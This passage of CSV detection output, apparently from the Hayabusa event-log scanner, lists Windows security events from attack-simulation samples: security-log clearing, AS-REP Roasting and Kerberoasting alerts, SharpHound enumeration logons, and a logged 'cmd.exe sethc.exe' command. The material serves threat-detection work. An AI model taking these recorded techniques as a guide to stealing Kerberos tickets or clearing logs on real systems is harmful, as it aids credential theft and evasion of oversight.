\??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: 